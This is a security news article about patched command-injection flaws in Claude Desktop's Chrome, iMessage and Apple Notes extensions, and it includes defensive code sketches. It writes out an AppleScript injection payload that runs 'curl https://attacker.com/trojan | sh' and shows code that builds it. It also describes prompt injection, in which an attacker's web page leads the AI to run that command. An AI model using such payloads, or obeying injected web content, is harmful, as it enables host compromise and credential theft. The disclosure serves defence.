PromptJacking: When AI Chat Prompts Become Cyber Attacks

Flaws in Claude Desktop’s extensions show how simple AI prompts can lead to system compromise.

Nov 5, 2025

Artificial intelligence (AI) tools have rapidly become integral to modern workflows, assisting users with everything from data analysis to creative writing.

However, the discovery of critical vulnerabilities in trusted AI platforms serves as a reminder that even cutting-edge systems are not immune to traditional cybersecurity flaws.

The recent identification of remote code execution (RCE) vulnerabilities in Claude Desktop’s official extensions highlights a serious security concern in AI-integrated environments.

How a Simple Prompt Becomes a Breach

Koi researchers recently uncovered severe RCE vulnerabilities in three official Claude Desktop extensions — those for Chrome, iMessage, and Apple Notes.

Each contained the same fundamental flaw: unsanitized command injection.

This vulnerability allowed attackers to exploit Claude Desktop simply by manipulating the content of a user’s query or the data retrieved from a website.

In practical terms, a seemingly innocent question, such as “Where can I play paddle in Brooklyn?”, could trigger the execution of arbitrary code on the user’s machine.

Sensitive data like SSH keys, AWS credentials, or stored browser passwords could be stolen without any malicious download or phishing attempt.

Anthropic rated the vulnerabilities as high severity (CVSS 8.9) and has since patched them.

Understanding Claude Desktop Extensions

Claude Desktop extensions are designed as modular connection points — packaged as Model Context Protocol (MCP) servers — allowing Claude to interact directly with local applications.

Each extension is distributed as a .mcpb bundle, containing both the MCP server code and a manifest that describes its capabilities. They function similarly to Chrome extensions in concept but differ in implementation.

While Chrome extensions operate within the browser’s security sandbox, Claude Desktop extensions run fully unsandboxed on the local machine, with full system privileges.

This design choice allows deep integration but introduces risk. Extensions can read and modify files, execute system commands, and access stored credentials.

A command injection vulnerability in such an environment becomes a direct pathway to full system compromise.

The Vulnerability

At the core of the vulnerability was improper input sanitization. Each MCP server accepted user-provided input and passed it directly into AppleScript commands without escaping or validation.

For example, when Claude was instructed to open a URL in Chrome, the extension built an AppleScript command from a template such as:

tell application "Google Chrome" to open location "${url}"

If the ${url} value closed the quoted string early and appended a payload, such as " & do shell script "curl https://attacker.com/trojan | sh" & ", the resulting AppleScript would execute arbitrary shell commands on the host system.
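The mechanics can be illustrated with a minimal sketch. It is a hypothetical reconstruction of the pattern described above, not the extensions' actual source: the function name buildOpenUrlScriptUnsafe and the example.com URL are assumptions made for illustration. The code only builds and prints strings; it does not run AppleScript.

```typescript
// Hypothetical reconstruction of the vulnerable pattern (not the real extension code):
// the URL is interpolated directly into AppleScript source text.
function buildOpenUrlScriptUnsafe(url: string): string {
  return `tell application "Google Chrome" to open location "${url}"`;
}

// A benign URL stays inside the quoted string literal.
const benign = buildOpenUrlScriptUnsafe("https://example.com");

// A crafted value closes the string with a double quote, appends a
// `do shell script` expression, and reopens a string so the trailing
// quote from the template still parses.
const payload =
  'https://example.com" & do shell script "curl https://attacker.com/trojan | sh" & "';
const injected = buildOpenUrlScriptUnsafe(payload);

console.log(benign);
console.log(injected);
```

In the second printed line, do shell script sits outside any string literal, so an AppleScript interpreter would treat it as code rather than as part of the URL.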

From Question to Compromise

The real danger came from prompt injection through web content. Claude frequently fetches and summarizes web pages to answer user queries.

If one of those pages is controlled by an attacker — or if a legitimate page is compromised — the content can be crafted to include instructions that trigger the vulnerability.

In such a scenario, a user might ask Claude a simple question, prompting the model to retrieve data from an attacker-controlled website.

That page, recognizing Claude’s user agent, could serve a hidden payload. Claude would then unwittingly execute the injected command through the vulnerable extension.

The result: remote attackers gaining local shell access with full permissions, enabling them to steal sensitive files, install backdoors, or exfiltrate credentials — all without the user noticing anything unusual.

The Hidden Risks of AI Integration

While these specific vulnerabilities have been patched, their existence underscores a broader issue with emerging AI extension ecosystems.

The MCP model allows developers to build extensions that interact deeply with local systems.

However, the combination of AI-assisted coding, limited security review, and the absence of sandboxing poses systemic risks.

As AI platforms grow more integrated with operating systems and enterprise environments, developers must adopt rigorous security practices, including strict input sanitization, privilege separation, and code auditing.
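As a rough illustration of strict input handling for the Chrome case, the sketch below restricts input to http(s) URLs and keeps the value out of the script source by handing it to osascript as an argument. The helper names (parseHttpUrl, escapeAppleScriptString, buildOsascriptArgs) are hypothetical, and this is one possible approach under those assumptions, not a description of Anthropic's actual patch.

```typescript
// Accept only http(s) URLs. The built-in URL constructor throws on input it cannot parse.
function parseHttpUrl(input: string): URL {
  const parsed = new URL(input);
  if (parsed.protocol !== "http:" && parsed.protocol !== "https:") {
    throw new Error(`unsupported scheme: ${parsed.protocol}`);
  }
  return parsed;
}

// Fallback for cases where a value must be embedded in AppleScript source:
// escape backslashes first, then double quotes.
function escapeAppleScriptString(value: string): string {
  return value.replace(/\\/g, "\\\\").replace(/"/g, '\\"');
}

// Preferred: the script text is constant and the URL travels as a separate
// argument, which the script reads through its `on run argv` handler.
function buildOsascriptArgs(input: string): string[] {
  const url = parseHttpUrl(input);
  return [
    "-e", "on run argv",
    "-e", 'tell application "Google Chrome" to open location (item 1 of argv)',
    "-e", "end run",
    url.href,
  ];
}

// Example: the crafted text ends up in the final argument only, never in the script.
const args = buildOsascriptArgs('https://example.com/" & do shell script "id" & "');
console.log(args);
```

The resulting array is meant to be passed to a process-spawning call that takes an argument list, such as Node's child_process.execFile("osascript", args), so that no shell or string concatenation is involved. Scheme validation alone is not sufficient, because a syntactically valid URL can still contain characters that are meaningful to AppleScript.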

Organizations should also employ defense-in-depth measures, such as monitoring outbound network activity, enforcing least-privilege execution, and isolating AI tools from sensitive credentials.
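One narrow way to keep credentials away from a helper process is to start it with an allowlisted environment rather than a copy of the parent's. The sketch below assumes a hypothetical allowlist and function name (ALLOWED_ENV_VARS, buildChildEnv). It covers only credentials exposed through environment variables, not key files on disk.

```typescript
// Hypothetical allowlist: variables a helper process is assumed to need.
const ALLOWED_ENV_VARS: readonly string[] = ["PATH", "HOME", "LANG", "TMPDIR"];

type Env = Record<string, string | undefined>;

// Copy only allowlisted variables, so secrets such as cloud access keys
// are dropped by default instead of being filtered out one by one.
function buildChildEnv(
  parentEnv: Env,
  allowed: readonly string[] = ALLOWED_ENV_VARS,
): Record<string, string> {
  const childEnv: Record<string, string> = {};
  for (const name of allowed) {
    const value = parentEnv[name];
    if (value !== undefined) {
      childEnv[name] = value;
    }
  }
  return childEnv;
}

// Example with a made-up parent environment.
const sampleParentEnv: Env = {
  PATH: "/usr/bin:/bin",
  HOME: "/Users/example",
  AWS_SECRET_ACCESS_KEY: "not-a-real-secret",
};
const childEnv = buildChildEnv(sampleParentEnv);
console.log(Object.keys(childEnv));
```

The returned object could be supplied as the env option when spawning the helper, for instance with Node's child_process.spawn. Protecting files such as SSH keys would still require operating system controls like separate user accounts or sandboxing.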

The Claude Desktop vulnerabilities demonstrate that even trusted AI platforms can harbor severe security flaws with real-world consequences.

As the AI ecosystem expands, ensuring secure integration between AI models and local systems will be essential. The lesson is not to abandon these tools but to approach them with informed caution.

Ken Underhill

Ken Underhill is an award-winning cybersecurity professional, bestselling author, and seasoned IT professional. He holds a graduate degree in cybersecurity and information assurance from Western Governors University and brings years of hands-on experience to the field.